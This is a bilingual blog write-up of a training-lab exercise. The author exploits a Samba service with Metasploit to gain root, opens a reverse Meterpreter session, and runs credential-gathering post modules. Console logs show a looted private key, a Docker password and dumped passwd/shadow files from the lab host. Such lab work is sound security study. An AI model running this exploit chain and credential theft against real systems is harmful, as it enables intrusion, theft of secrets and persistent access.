Post Exploitation Lab II

Posted by r3kind1e on March 24, 2023

Post Exploitation Lab II(后期利用实验室 II)

Overview(概述)

In this lab, the target machine is running a vulnerable file sharing service. Exploit it and run the following post modules on the target:

在本实验中,目标机器正在运行易受攻击的文件共享服务。利用它并在目标上运行以下后期模块:

  • post/multi/gather/ssh_creds
  • post/multi/gather/docker_creds
  • post/linux/gather/hashdump
  • post/linux/gather/ecryptfs_creds
  • post/linux/gather/enum_psk
  • post/linux/gather/enum_xchat
  • post/linux/gather/phpmyadmin_credsteal
  • post/linux/gather/pptpd_chap_secrets
  • post/linux/manage/sshkey_persistence

Instructions:

  • This lab is dedicated to you! No other users are on this network
  • Once you start the lab, you will have access to a root terminal of a Kali instance
  • Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
  • The target server should be located at the IP address 192.X.Y.3.
  • Do not attack the gateway located at IP address 192.X.Y.1
  • postgresql is not running by default so Metasploit may give you an error about this when starting

Solutions

The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-195.pdf

我自己的思路

post/multi/gather/ssh_creds

Multi Gather OpenSSH PKI Credentials Collection

This module will collect the contents of all users’ .ssh directories on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.

Multi Gather OpenSSH PKI 凭据集合

该模块将收集目标机器上所有用户的 .ssh 目录的内容。此外,还会下载 known_hosts 和 authorized_keys 以及任何其他文件。该模块主要基于 firefox_creds.rb。

post/multi/gather/docker_creds

Multi Gather Docker Credentials Collection

Multi Gather Docker Credentials Collection

This module will collect the contents of all users’ .docker directories on the targeted machine. If the user has already push to docker hub, chances are that the password was saved in base64 (default behavior).

Multi Gather Docker 凭据集合

该模块将收集目标机器上所有用户的 .docker 目录的内容。 如果用户已经推送到 docker hub,密码很可能是以 base64 格式保存的(默认行为)。

post/linux/gather/hashdump

Linux Gather Dump Password Hashes for Linux Systems

Linux Gather Dump Password Hashes for Linux Systems

Post Module to dump the password hashes for all users on a Linux System

Linux 为 Linux 系统收集转储密码哈希

Post 模块转储 Linux 系统上所有用户的密码哈希

post/linux/gather/ecryptfs_creds

Gather eCryptfs Metadata

Gather eCryptfs Metadata

This module will collect the contents of all users’ .ecrypts directories on the targeted machine. Collected “wrapped-passphrase” files can be cracked with John the Ripper (JtR) to recover “mount passphrases”.

收集 eCryptfs 元数据

该模块将收集目标机器上所有用户的 .ecrypts 目录的内容。 收集到的“wrapped-passphrase”文件可以用 John the Ripper (JtR) 破解以恢复“mount passphrases”。

post/linux/gather/enum_psk

Linux Gather NetworkManager 802-11-Wireless-Security Credentials

Linux Gather NetworkManager 802-11-Wireless-Security Credentials

This module collects 802-11-Wireless-Security credentials such as Access-Point name and Pre-Shared-Key from Linux NetworkManager connection configuration files.

Linux 收集 NetworkManager 802-11-无线安全凭证

该模块从 Linux NetworkManager 连接配置文件中收集 802-11-Wireless-Security 凭证,例如接入点名称和预共享密钥。

post/linux/gather/enum_xchat

Linux Gather XChat Enumeration

Linux Gather XChat Enumeration

This module will collect XChat’s config files and chat logs from the victim’s machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.

Linux Gather XChat枚举

该模块将从受害者的机器上收集 XChat 的配置文件和聊天记录。您可以选择三种操作:CONFIGS、CHATS 和 ALL。CONFIGS 选项可用于收集频道设置、频道/服务器密码等信息。CHATS 选项将简单地下载所有 .log 文件。

post/linux/gather/phpmyadmin_credsteal

Phpmyadmin credentials stealer

Phpmyadmin credentials stealer

This module gathers Phpmyadmin creds from target linux machine.

Phpmyadmin 凭据窃取程序

该模块从目标 linux 机器收集 Phpmyadmin 凭据。

post/linux/gather/pptpd_chap_secrets

Linux Gather PPTP VPN chap-secrets Credentials

Linux Gather PPTP VPN chap-secrets Credentials

This module collects PPTP VPN information such as client, server, password, and IP from your target server’s chap-secrets file.

Linux 收集 PPTP VPN chap-secrets 凭据

该模块从目标服务器的 chap-secrets 文件中收集 PPTP VPN 信息,例如客户端、服务器、密码和 IP。

post/linux/manage/sshkey_persistence

SSH Key Persistence

SSH Key Persistence

This module will add an SSH key to a specified user (or all), to allow remote login via SSH at any time.

SSH 密钥持久性

该模块将为指定用户(或所有用户)添加 SSH 密钥,以允许随时通过 SSH 进行远程登录。

我自己的思路

1
2
3
4
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.198.6.2  netmask 255.255.255.0  broadcast 192.198.6.255
        ether 02:42:c0:c6:06:02  txqueuelen 0  (Ethernet)

Target IP Address: 192.198.6.3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@attackdefense:~# service postgresql start && msfconsole -q
[ ok ] Starting PostgreSQL 11 database server: main.
msf5 > db_nmap -sV 192.198.6.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-24 13:59 UTC
[*] Nmap: Nmap scan report for target-1 (192.198.6.3)
[*] Nmap: Host is up (0.0000090s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT    STATE SERVICE     VERSION
[*] Nmap: 139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: MAC Address: 02:42:C0:C6:06:03 (Unknown)
[*] Nmap: Service Info: Host: VICTIM-1
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.58 seconds
msf5 > services
Services
========

host         port  proto  name         state  info
----         ----  -----  ----         -----  ----
192.198.6.3  139   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.198.6.3  445   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
msf5 > setg RHOSTS 192.198.6.3
RHOSTS => 192.198.6.3
1
2
3
4
5
6
7
8
msf5 > search type:exploit samba

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   3   exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS          192.198.6.3      yes       The target address range or CIDR identifier
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf5 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.198.6.3:445 - Using location \\192.198.6.3\exploitable\tmp for the path
[*] 192.198.6.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.198.6.3:445 - Share 'exploitable' has server-side path '/
[*] 192.198.6.3:445 - Uploaded payload to \\192.198.6.3\exploitable\tmp\KiPyxObR.so
[*] 192.198.6.3:445 - Loading the payload from server-side path /tmp/KiPyxObR.so using \\PIPE\/tmp/KiPyxObR.so...
[-] 192.198.6.3:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.198.6.3:445 - Loading the payload from server-side path /tmp/KiPyxObR.so using /tmp/KiPyxObR.so...
[+] 192.198.6.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (192.198.6.2:34279 -> 192.198.6.3:445) at 2023-03-24 14:04:27 +0000

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
msf5 exploit(linux/samba/is_known_pipename) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.198.6.2:34279 -> 192.198.6.3:445 (192.198.6.3)

msf5 exploit(linux/samba/is_known_pipename) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.198.6.2:4433 
[*] Sending stage (985320 bytes) to 192.198.6.3
[*] Meterpreter session 2 opened (192.198.6.2:4433 -> 192.198.6.3:55958) at 2023-03-24 14:07:20 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 exploit(linux/samba/is_known_pipename) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                 Connection
  --  ----  ----                   -----------                                 ----------
  1         shell cmd/unix                                                     192.198.6.2:34279 -> 192.198.6.3:445 (192.198.6.3)
  2         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ 192.198.6.3  192.198.6.2:4433 -> 192.198.6.3:55958 (192.198.6.3)
1
2
3
4
5
6
7
8
9
10
11
12
13
msf5 exploit(linux/samba/is_known_pipename) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 192.198.6.3
OS           : Debian 8.11 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 
Background session 2? [y/N]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
msf5 exploit(linux/samba/is_known_pipename) > use post/multi/gather/ssh_creds
msf5 post(multi/gather/ssh_creds) > info

       Name: Multi Gather OpenSSH PKI Credentials Collection
     Module: post/multi/gather/ssh_creds
   Platform: BSD, Linux, OSX, Unix
       Arch: 
       Rank: Normal

Provided by:
  Jim Halfpenny

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module will collect the contents of all users' .ssh directories 
  on the targeted machine. Additionally, known_hosts and 
  authorized_keys and any other files are also downloaded. This module 
  is largely based on firefox_creds.rb.

msf5 post(multi/gather/ssh_creds) > set SESSION 2
SESSION => 2
msf5 post(multi/gather/ssh_creds) > exploit

[*] Finding .ssh directories
[*] Looting 1 directories
[+] Downloaded /root/.ssh/id_rsa.pub -> /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa.pub_877265.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[+] Downloaded /root/.ssh/id_rsa -> /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa_113522.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[+] Downloaded /root/.ssh/authorized_keys -> /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.authorized_k_146361.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[+] Downloaded /root/.ssh/known_hosts -> /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.known_hosts_532997.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[*] Post module execution completedmsf5 post(multi/gather/ssh_creds) > loot
Loot
====
host         service  type                 name                 content     info                          path----         -------  ----                 ----                 -------     ----                          ----
192.198.6.3           ssh.id_rsa.pub       ssh_id_rsa.pub       text/plain  OpenSSH id_rsa.pub File       /root/.msf4/loot/20230324141218_default_192.198.6.
3_ssh.id_rsa.pub_877265.txt
192.198.6.3           ssh.id_rsa           ssh_id_rsa           text/plain  OpenSSH id_rsa File           /root/.msf4/loot/20230324141218_default_192.198.6.
3_ssh.id_rsa_113522.txt
192.198.6.3           ssh.authorized_keys  ssh_authorized_keys  text/plain  OpenSSH authorized_keys File  /root/.msf4/loot/20230324141218_default_192.198.6.
3_ssh.authorized_k_146361.txt
192.198.6.3           ssh.known_hosts      ssh_known_hosts      text/plain  OpenSSH known_hosts File      /root/.msf4/loot/20230324141218_default_192.198.6.
3_ssh.known_hosts_532997.txt
1
2
3
4
5
6
7
8
msf5 post(multi/gather/ssh_creds) > cat  /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa.pub_877265.txt
[*] exec: cat  /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa.pub_877265.txt

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDCAHi8jxxM2JsOnXhYvcGE+BSk0A/LiYXga5tY0VY1agbBn0eliru1UR8A58JPMAvgRERsI+MumQGruDNzx8iGvaM9EjajR+igMb1UdrJlRDfgvZvDKGje
g57Mifjn3Q+37BTuoaCU13DzCso2CMPKYxrFV3QZw1483G+FTBmKQ6XsFET/0TXwM+gBuZr8Xjgpejumqj9Ai7s4Sc19oGBr0PG7S0Xan0dAIp7X7U3sM2xLnW7jzZUL04TIPWwFkbFNll4xJj7dnLWqB4wf
V7A65R3kg+KRFvGgJbSfxU1uhDJ58BHIfN/CvJNULrqs51vK7DPq4NHPqjx64/XWgdcasct9uNh9saXFIvBC3zr4Ct2L5mQ/F88tTDvpMdOHn7xT/aesrJqOysNs60GK4tcAaRfJdemjyZsXcIL0kITqSu7K
n+eKq0mDAvvtYi9NPBi8dbr80zvKP9VsRMfMylQQz50GXdl9/hqIC/cvfeZbFCbXB2XQY4ln6ftIFFHN2WislqTWeW0jgEDSmXbVI0YGZrks+Q8W7mEi+T/HrcHL6zMpkO5Crte2HLYi5VdHiACKO/aS4wcX
VX4pjg+nc1Qh3japD2GyWdkb+8ILWvdA9wZr5Qk+8UL0NVU2KqdirxXcUIEOil+1K4XD/GoD4BN5J0uhkl3/hUYYf/tWdlFzWw== 172.168.5.153
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
msf5 post(multi/gather/ssh_creds) > cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa_113522.txt
[*] exec: cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.id_rsa_113522.txt

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AD6F56B6F97C8F170282694A190D3E70

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
-----END RSA PRIVATE KEY-----
1
2
3
4
5
6
7
msf5 post(multi/gather/ssh_creds) > cat  /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.authorized_k_146361.txt
[*] exec: cat  /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.authorized_k_146361.txt


ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkk25JgzX1AhKJ44v7u0mEdcnQdQJVMD/OuazI79ZYYjLW6idWVvQoLTm0//0+VIeEJl2hZqdUf1xcrKsJVxITu3gkV9Vt08tcRj0JNOvgoRqls0SkpN49
V/FobPyL93oulrtgAznuQQ0j1IzPec2J6JnSMWydzO5WEyjtMOSes7OO5H4CLhdKyA587MOjMNBWwRhDkOiwdZ8X6AGoysRxQopA96MsKH8RaJhYeRE1dx9woD6nm2s2fkt9Z3mh1OY/QWd12ri6bfCfDcCs
q9HGZb/c2nVGAWVDSMB3ge/N3egqkBmWHnrl1KoBc/Mc+pMrQHGKT6EP1pHa8PVMnRz1
1
2
3
4
5
6
7
msf5 post(multi/gather/ssh_creds) > cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.known_hosts_532997.txt
[*] exec: cat /root/.msf4/loot/20230324141218_default_192.198.6.3_ssh.known_hosts_532997.txt

|1|iM67F1aXb4HjGmoSUbo530yirQI=|OjIgmx0rWohz1taiWu9OzMlhzVo= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC3+Idhph1RjOwoUpMym1T3
Z8vXASo/dq1AvHs8OW1Y/YD+z9DgxSwRbBnjR0+i7X2fX/3A0Cul/lDY7qKmfwn8=
|1|P5xNWYsrjEgRNLFeDnL7W5MCaec=|RhjSVMJfPOOR1X0TQGIVmpgvcqU= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIKbtIYRARYYax0YAinw8ov
8b3ta+yaocJtjFqKtFQ9QJB8mF0CE16WQkMWBDnrsccTbPgZYXI23wEP61AvHIJM=
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
msf5 post(multi/gather/ssh_creds) > use post/multi/gather/docker_creds
msf5 post(multi/gather/docker_creds) > info

       Name: Multi Gather Docker Credentials Collection
     Module: post/multi/gather/docker_creds
   Platform: BSD, Linux, OSX, Unix
       Arch: 
       Rank: Normal

Provided by:
  Flibustier

Compatible session types:
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module will collect the contents of all users' .docker 
  directories on the targeted machine. If the user has already push to 
  docker hub, chances are that the password was saved in base64 
  (default behavior).

msf5 post(multi/gather/docker_creds) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                 Connection
  --  ----  ----                   -----------                                 ----------
  1         shell cmd/unix                                                     192.198.6.2:34279 -> 192.198.6.3:445 (192.198.6.3)
  2         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ 192.198.6.3  192.198.6.2:4433 -> 192.198.6.3:55958 (192.198.6.3)

msf5 post(multi/gather/docker_creds) > set SESSION 1
SESSION => 1
msf5 post(multi/gather/docker_creds) > exploit

[*] Finding .docker directories
[*] Looting 1 directories
[*] Downloading /root/.docker/config.json -> config.json
[+] Found attackdefence:Str0ngPassword@123
[+] Saved credentials
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
msf5 post(multi/gather/docker_creds) > use post/linux/gather/hashdump
msf5 post(linux/gather/hashdump) > info

       Name: Linux Gather Dump Password Hashes for Linux Systems
     Module: post/linux/gather/hashdump
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  Carlos Perez <carlos_perez@darkoperator.com>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  Post Module to dump the password hashes for all users on a Linux 
  System

msf5 post(linux/gather/hashdump) > set SESSION 2
SESSION => 2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf5 post(linux/gather/hashdump) > exploit

[+] Unshadowed Password File: /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.hashes_326677.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > loot

Loot
====

host         service  type                 name                   content     info                            path
----         -------  ----                 ----                   -------     ----                            ----
192.198.6.3           linux.shadow         shadow.tx              text/plain  Linux Password Shadow File      /root/.msf4/loot/20230324142733_default_192.19
8.6.3_linux.shadow_556481.txt
192.198.6.3           linux.passwd         passwd.tx              text/plain  Linux Passwd File               /root/.msf4/loot/20230324142733_default_192.19
8.6.3_linux.passwd_449488.txt
192.198.6.3           linux.hashes         unshadowed_passwd.pwd  text/plain  Linux Unshadowed Password File  /root/.msf4/loot/20230324142733_default_192.19
8.6.3_linux.hashes_326677.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.shadow_556481.txt
[*] exec: cat /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.shadow_556481.txt

root:*:17774:0:99999:7:::
daemon:*:17774:0:99999:7:::
bin:*:17774:0:99999:7:::
sys:*:17774:0:99999:7:::
sync:*:17774:0:99999:7:::
games:*:17774:0:99999:7:::
man:*:17774:0:99999:7:::
lp:*:17774:0:99999:7:::
mail:*:17774:0:99999:7:::
news:*:17774:0:99999:7:::
uucp:*:17774:0:99999:7:::
proxy:*:17774:0:99999:7:::
www-data:*:17774:0:99999:7:::
backup:*:17774:0:99999:7:::
list:*:17774:0:99999:7:::
irc:*:17774:0:99999:7:::
gnats:*:17774:0:99999:7:::
nobody:*:17774:0:99999:7:::
systemd-timesync:*:17774:0:99999:7:::
systemd-network:*:17774:0:99999:7:::
systemd-resolve:*:17774:0:99999:7:::
systemd-bus-proxy:*:17774:0:99999:7:::
messagebus:*:17812:0:99999:7:::
colord:*:17812:0:99999:7:::
saned:*:17812:0:99999:7:::
usbmux:*:17812:0:99999:7:::
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.passwd_449488.txt
[*] exec: cat /root/.msf4/loot/20230324142733_default_192.198.6.3_linux.passwd_449488.txt

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:107::/var/run/dbus:/bin/false
colord:x:105:112:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:106:113::/var/lib/saned:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
msf5 post(linux/gather/hashdump) > use post/linux/gather/ecryptfs_creds
msf5 post(linux/gather/ecryptfs_creds) > info

       Name: Gather eCryptfs Metadata
     Module: post/linux/gather/ecryptfs_creds
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  Dhiru Kholia <dhiru@openwall.com>

Compatible session types:
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module will collect the contents of all users' .ecrypts 
  directories on the targeted machine. Collected "wrapped-passphrase" 
  files can be cracked with John the Ripper (JtR) to recover "mount 
  passphrases".

